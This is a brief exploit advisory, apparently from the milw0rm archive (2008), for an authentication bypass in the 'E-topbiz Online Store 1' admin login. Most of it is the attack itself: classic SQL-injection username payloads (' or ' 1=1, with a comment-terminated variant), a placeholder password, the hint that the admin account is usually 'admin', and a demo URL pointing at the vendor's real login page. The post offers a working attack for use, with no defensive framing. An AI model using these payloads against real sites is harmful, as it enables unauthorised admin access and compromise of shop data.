29 lines
No EOL
509 B
Text
29 lines
No EOL
509 B
Text
E-topbiz Online Store 1 (Auth Bypass) SQL Injection Vulnerability
|
|
|
|
author: ZoRLu msn: trt-turk@hotmail.com
|
|
|
|
Home: www.z0rlu.blogspot.com
|
|
|
|
N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( bIktIm a.q )
|
|
|
|
Exploit:
|
|
|
|
username: [real_admin_name] ' or ' 1=1
|
|
|
|
password: ZoRLu
|
|
|
|
note: generally admin name: admin
|
|
|
|
|
|
for demo:
|
|
|
|
http://e-topbiz.com/trafficdemos/store1/admin/login.php
|
|
|
|
username: admin ' or ' 1=1--
|
|
|
|
password: ZoRLu
|
|
|
|
|
|
thanks: str0ke & yildirimordulari.org & darkc0de.com
|
|
|
|
# milw0rm.com [2008-11-07] |